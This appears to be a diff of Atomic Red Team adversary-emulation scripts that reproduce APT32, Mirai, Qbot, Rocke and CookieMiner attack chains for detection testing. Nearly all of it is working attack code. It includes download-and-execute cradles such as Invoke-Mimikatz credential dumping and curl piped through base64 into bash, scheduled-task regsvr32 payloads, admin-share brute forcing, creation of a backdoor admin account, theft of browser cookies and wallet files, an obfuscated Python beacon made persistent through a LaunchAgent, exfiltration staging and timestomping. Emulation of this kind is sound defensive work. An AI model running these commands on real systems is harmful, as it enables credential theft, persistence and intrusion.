# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+105
View File
@@ -0,0 +1,105 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hide Artifacts: Hidden Files and Directories https://attack.mitre.org/techniques/T1564/001/
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Software Discovery: Security Software Discovery https://attack.mitre.org/techniques/T1518/001/
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Archive Collected Data: Archive via Library https://attack.mitre.org/techniques/T1560/002/
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File Indicator Removal on Host: File Deletion https://attack.mitre.org/techniques/T1070/004/
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1560.002 - Archive Collected Data: Archive via Library
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1543.001 - Create or Modify System Process: Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1071.001 - Application Layer Protocol: Web Protocols
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/dragonstail_benign.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
# powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs
+34
View File
@@ -0,0 +1,34 @@
On Error Resume Next
' Properly declare everything
Dim shell, remoteFile, wmi_os_caption, securityCenterWMI, avItems, fso, localFile, bitsadminReturn, objProcess
Set shell = WScript.CreateObject("WScript.Shell")
' Tactic: Discovery
' Technique: T1082 - System Information Discovery
Set wmi_os_caption = shell.Exec("wmic OS get Caption /value")
' Tactic: Discovery
' Technique: T1518.001 - Software Discovery: Security Software Discovery
Set securityCenterWMI = GetObject("winmgmts:\\.\root\SecurityCenter2")
Set avItems = securityCenterWMI.ExecQuery("Select * From AntiVirusProduct")
Set fso = CreateObject("Scripting.FileSystemObject")
localFile = fso.GetSpecialFolder(2) & "\Atomic_Qbot.exe"
' Tactic: Command and Control
' Technique: T1105 - Ingress Tool Transfer
bitsadminReturn = shell.Run("bit"&"sadmin /transfer qcxjb" & Second(Now) & " /Priority HIGH " & "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe " & localFile, 0, True)
' Tactic: Defense Evasion
' Technique: T1036 - Masquerading
MsgBox "The file can't be opened because there are problems with the content.", 0, "Microsoft Word"
' Tactic: Execution
' Technique: T1047 - Windows Management Instrumentation
If (bitsadminReturn = 0) And (fso.FileExists(localFile)) Then
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
objProcess.Create localFile
End If
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncomment the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
